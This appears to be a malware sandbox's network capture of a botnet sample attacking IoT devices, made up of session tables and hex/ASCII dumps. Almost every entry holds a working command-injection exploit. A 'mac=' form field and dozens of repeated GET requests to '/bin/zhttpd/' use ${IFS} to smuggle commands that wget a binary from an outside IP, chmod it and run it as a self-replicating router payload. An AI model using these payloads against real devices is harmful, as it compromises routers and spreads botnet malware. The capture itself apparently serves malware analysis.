                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 14, 2024 15:50:48.495677948 CET398INHTTP/1.0 403 Access denied because Web Monitor access is not permitted from this source(no certificate presented). Please consult http-access directive in PMTA User Guide.
                                      Content-Type: text/html
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 62 65 63 61 75 73 65 20 57 65 62 20 4d 6f 6e 69 74 6f 72 20 61 63 63 65 73 73 20 69 73 20 6e 6f 74 20 70 65 72 6d 69 74 74 65 64 20 66 72 6f 6d 20 74 68 69 73 20 73 6f 75 72 63 65 28 6e 6f 20 63 65 72 74 69 66 69 63 61 74 65 20 70 72 65 73 65 6e 74 65 64 29 2e 20 50 6c 65 61 73 65 20 63 6f 6e 73 75 6c 74 20 68 74 74 70 2d 61 63 63 65 73 73 20 64 69 72 65 63 74 69 76 65 20 69 6e 20 50 4d 54 41 20 55 73 65 72 20 47 75 69 64 65 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><body>Access denied because Web Monitor access is not permitted from this source(no certificate presented). Please consult http-access directive in PMTA User Guide.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4714192.168.2.1442618180.178.253.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342042923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4715192.168.2.145297037.142.238.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342089891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4716192.168.2.1458438118.84.249.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342154980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4717192.168.2.145956690.45.161.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342191935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4718192.168.2.145130847.123.200.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342248917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4719192.168.2.1448516177.184.99.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342324972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4720192.168.2.143485219.172.160.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342365980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4721192.168.2.1454640119.89.218.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342422962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4722192.168.2.143754086.26.210.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342482090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4723192.168.2.144800841.129.111.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342557907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4724192.168.2.145947678.6.137.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342617035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4725192.168.2.143931868.58.86.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342690945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4726192.168.2.144877643.41.246.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342722893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4727192.168.2.144406066.1.193.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342758894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4728192.168.2.144847819.223.102.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342789888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4729192.168.2.1444066171.238.192.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342825890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4730192.168.2.1435410102.26.241.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342878103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4731192.168.2.1452956112.210.118.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342910051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4732192.168.2.1447008199.74.230.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.342977047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4733192.168.2.1438706138.179.47.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343043089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4734192.168.2.145426095.243.35.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343110085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4735192.168.2.1459776125.249.25.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343163013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4736192.168.2.1433448210.166.233.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343228102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4737192.168.2.1450960145.239.200.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343291044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4738192.168.2.145444681.55.255.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343326092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4739192.168.2.1456410131.239.120.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343383074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4740192.168.2.1440982107.91.138.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343415022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4741192.168.2.1440810217.32.120.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343473911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4742192.168.2.1443862201.64.210.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343525887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4743192.168.2.1446596174.94.84.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343585014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4744192.168.2.1437076160.58.115.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343652010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4745192.168.2.1444808114.247.49.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343698978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4746192.168.2.146096461.193.121.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343730927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4747192.168.2.14575708.159.49.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343791962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4748192.168.2.1454034155.140.163.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343831062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4749192.168.2.145485440.237.80.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343878031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4750192.168.2.145627467.199.42.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343921900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4751192.168.2.1455818117.163.115.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.343967915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4752192.168.2.144681264.178.191.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344038963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4753192.168.2.14429961.218.183.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344113111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4754192.168.2.1442348209.108.120.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344172955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4755192.168.2.144688281.4.251.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344221115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4756192.168.2.145525278.167.16.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344280958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4757192.168.2.1454236140.71.72.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344340086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4758192.168.2.1448236151.236.8.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344388962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4759192.168.2.143403024.81.211.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344460964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4760192.168.2.144479817.12.118.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344511032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4761192.168.2.1441468204.190.122.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344537973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4762192.168.2.146008693.41.214.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344614029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4763192.168.2.1442700166.171.105.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344677925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4764192.168.2.1444944148.226.46.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344731092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4765192.168.2.145191212.116.53.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344788074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4766192.168.2.145445066.128.52.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344847918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4767192.168.2.143411686.59.124.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344892979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4768192.168.2.143481449.21.47.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344934940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4769192.168.2.1442990148.7.225.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.344979048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4770192.168.2.144746023.150.2.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345031023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4771192.168.2.1433186104.231.130.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345094919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4772192.168.2.1460054160.33.244.137443
                                      TimestampBytes transferredDirectionData
